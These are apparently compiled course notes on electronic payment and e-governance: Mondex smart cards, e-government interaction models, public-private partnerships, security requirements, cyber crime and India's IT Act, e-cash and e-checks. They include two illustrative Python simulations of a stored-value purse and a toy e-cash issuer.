o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
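The offline card-to-card transfer and the "rolling 10 transactions" record above, together with the overflow problem the critics describe, can be simulated in a few dozen lines. This is an added example, not Mondex or MULTOS code: a purse that only moves value it actually holds, keeps a fixed-size log on the card, and reports on the next upload how many entries were overwritten before the bank ever saw them. Everything here (the `Purse` class, the per-card sequence counter, the log size of 10 taken from the privacy slide) is my construction, and the real card's secure messaging between chips is omitted.

```python
from collections import deque
from dataclasses import dataclass, field

LOG_SIZE = 10   # the notes describe a rolling record of 10 transactions on the card


@dataclass
class Purse:
    card_id: str
    balance: int                    # stored value in the smallest currency unit
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_SIZE))
    seq: int = 0                    # per-card transaction counter, never reused
    uploaded_seq: int = 0           # highest seq the bank has received so far

    def _record(self, kind: str, other: str, amount: int) -> None:
        self.seq += 1
        self.log.append((self.seq, kind, other, amount))   # oldest entry drops off


def transfer(src: Purse, dst: Purse, amount: int) -> bool:
    """Offline card-to-card transfer: no bank involved. Value moves only if the
    payer holds it, so the total across both cards is conserved."""
    if amount <= 0 or amount > src.balance or src.card_id == dst.card_id:
        return False
    src.balance -= amount
    dst.balance += amount
    src._record("debit", dst.card_id, amount)
    dst._record("credit", src.card_id, amount)
    return True


def upload_log(card: Purse) -> dict:
    """What the bank recovers when the card next goes online: the surviving
    entries, plus how many were overwritten since the previous upload."""
    entries = list(card.log)
    first_surviving = entries[0][0] if entries else card.seq + 1
    lost = max(0, first_surviving - card.uploaded_seq - 1)
    card.uploaded_seq = card.seq
    return {"entries": entries, "lost": lost}


def run_demo() -> dict:
    alice = Purse("card-A", 5000)
    bob = Purse("card-B", 0)
    ok = [transfer(alice, bob, 100) for _ in range(12)]   # 12 offline payments
    overdraft = transfer(alice, bob, 10_000)              # more than the card holds
    report = upload_log(alice)
    return {
        "all_ok": all(ok),
        "overdraft_refused": not overdraft,
        "alice_balance": alice.balance,
        "bob_balance": bob.balance,
        "value_conserved": alice.balance + bob.balance == 5000,
        "surviving": len(report["entries"]),
        "lost": report["lost"],
    }


if __name__ == "__main__":
    print(run_demo())
```

With twelve transfers before the first upload, two records are gone from the card before the bank can collect them. The card still knows its own balance, so no value is lost, but the audit trail has a hole, which is exactly why the text says fraud detection cannot be fully reliable: a card that stays offline long enough can shed the very entries an investigator would want.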

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B), government-to-government (G2G) as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance ndash

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with making this definition congruent with a definition of e-governance is that it makes no provision for the governance of ICTs themselves. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP-based e-governance projects. Each project involved mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well-laid-out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is possible because of the characteristics of CORBA: it is a location-transparent, language-independent, implementation-independent and operating-system-independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire e-Governance system, is possible if the middleware is designed to provide the necessary services, such as Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) - Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) - Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving:
  – Long Term Contracts
  – User Charges and/or Payments flowing between the Parties
  – Shared Investments, but Mainly Private
  – Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition – For and In the Market


The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program, Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract/Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure; a repository of electronic information on government laws and policies, including links to archived information and downloadable forms; and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend also to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and is thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS;
• continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication: capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.
• Authorization: capability to grant access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.
• Confidentiality: capability to prevent unauthorized access to information.
• Integrity: capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
• Traceability: capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
• Non-repudiation: capability to prevent a person or system that intervened in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• Protecting premises, equipment and systems software, including input-output units.
• Protecting software applications used to process personal data.
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented examples of cyber attacks use techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis.
• Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness.
• Continually improve its control environment.
• Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries that were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

121 Million Internet Users
65 Million Active Internet Users, up by 28% from 51 million in 2010
50 Million users shop online on E-commerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• Secures access;
• Downloads, copies or extracts any data, computer database or any information;
• Introduces or causes to be introduced any virus or contaminant;
• Disrupts or causes disruption;
• Denies or causes denial of access to any person;
• Provides any assistance to any person to facilitate access;
• Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or
• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment
65 | Tampering with computer source documents - intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years or/and with fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means - sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


This is a simple model of an E-cash payment system. It gives an idea of how the e-cash payment system works. The model is explained step by step in the upcoming slides.

The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant to acquire services, for which the customer authenticates the payment to the trader.


In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds, which are transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer of the approval of the payment made by the customer into the trader's account.

A system that allows a person to pay for goods or services by transmitting a number from one computer to another.

Like the serial numbers on real currency notes, the E-cash numbers are unique.

This is issued by a bank and represents a specified sum of real money.

It is anonymous and reusable.

Electronic Cash Security

Complex cryptographic algorithms prevent double spending

Anonymity is preserved unless double spending is attempted

Serial numbers can allow tracing to prevent money laundering
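The four-phase token flow above and the double-spend check from the security list, as an added example that is not part of the original notes. It assumes an HMAC tag in place of the blind signatures real e-cash uses, so unlike the anonymity described above this toy issuer can link serials to customers; the names Issuer, Trader and demo are hypothetical.

```python
"""Toy model of the token-based e-cash flow in the notes above (added example).
Assumption, not from the notes: tokens carry an HMAC over (serial, value) instead
of the blind signatures real e-cash uses, so this issuer can link serials to the
customer; double-spend detection (remembering honoured serials) is the real idea."""
from __future__ import annotations

import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    """One e-cash token: unique serial number, face value, issuer's tag."""
    serial: str
    value: int
    tag: str


class Issuer:
    """The customer's bank: issues tokens (phase 1) and redeems them (phase 3)."""

    def __init__(self) -> None:
        self._key = secrets.token_bytes(32)   # issuer secret, never leaves the bank
        self._spent: set[str] = set()         # serials already honoured
        self._accounts: dict[str, int] = {}   # account name -> balance

    def open_account(self, name: str, balance: int) -> None:
        self._accounts[name] = balance

    def balance(self, name: str) -> int:
        return self._accounts.get(name, 0)

    def _tag(self, serial: str, value: int) -> str:
        # The tag binds value to serial, so neither can be altered after issue.
        msg = f"{serial}:{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def issue(self, customer: str, denominations: list[int]) -> list[Token]:
        """Phase 1: debit the customer's account and hand out fresh tokens."""
        total = sum(denominations)
        if self.balance(customer) < total:
            raise ValueError("insufficient funds")
        self._accounts[customer] -= total
        tokens = []
        for value in denominations:
            serial = secrets.token_hex(16)    # unique, like a banknote serial
            tokens.append(Token(serial, value, self._tag(serial, value)))
        return tokens

    def redeem(self, trader: str, token: Token) -> str:
        """Phase 3: verify the token and credit the trader.
        Returns 'ok', 'forged' or 'double-spend'; only 'ok' moves money."""
        if not hmac.compare_digest(token.tag, self._tag(token.serial, token.value)):
            return "forged"
        if token.serial in self._spent:
            return "double-spend"
        self._spent.add(token.serial)
        self._accounts[trader] = self.balance(trader) + token.value
        return "ok"


class Trader:
    """The merchant: delivers only after the issuer has honoured every token."""

    def __init__(self, name: str, issuer: Issuer) -> None:
        self.name = name
        self._issuer = issuer
        self.delivered: list[str] = []

    def sell(self, item: str, payment: list[Token]) -> bool:
        """Phases 2 and 4: redeem the endorsed tokens, then deliver or refuse."""
        results = [self._issuer.redeem(self.name, t) for t in payment]
        if all(r == "ok" for r in results):
            self.delivered.append(item)
            return True
        return False


def demo() -> dict[str, object]:
    """Runs the full flow, then replays spent tokens and presents a tampered one."""
    bank = Issuer()
    bank.open_account("customer", 500)
    bank.open_account("trader", 0)
    shop = Trader("trader", bank)
    wallet = bank.issue("customer", [100, 10, 10])         # phase 1: 120 withdrawn
    first = shop.sell("ebook", wallet)                      # phases 2-4: accepted
    replay = shop.sell("ebook again", wallet)               # same serials: refused
    forged = Token(wallet[0].serial, 1000, wallet[0].tag)   # face value altered
    return {
        "first_sale": first,                                # True
        "replay_sale": replay,                              # False
        "forged_result": bank.redeem("trader", forged),     # 'forged'
        "customer_balance": bank.balance("customer"),       # 380
        "trader_balance": bank.balance("trader"),           # 120
    }
```

Calling demo() shows that a replayed wallet and a token with an altered face value are both refused, while the customer is debited exactly once.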

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.


However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on safe "https" protocols, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.

Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.

E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges, which is why very low payments are not charged a fee.

Limitations

• However secure the e-cash payment system may be, no one is safe against online fraud. In this case the fraudulent party is the trader: the trader may take the amount but not provide the services.
• While making the payment it is very important that the internet connection and power supply stay active. If the payment is in process and the internet connection fails in between, it can lead to loss of information, i.e. the amount is charged but does not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
• E-cash is not for everyone. Low-income segments without computer and internet access are unable to enjoy the usage of E-cash.

The rise of E-cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income-group readiness and technology reliability issues will bring E-cash closer to perfect. Countries such as India, where people were hesitant to use such methods, have shown tremendous growth in online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.

E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read on for what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal prints a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

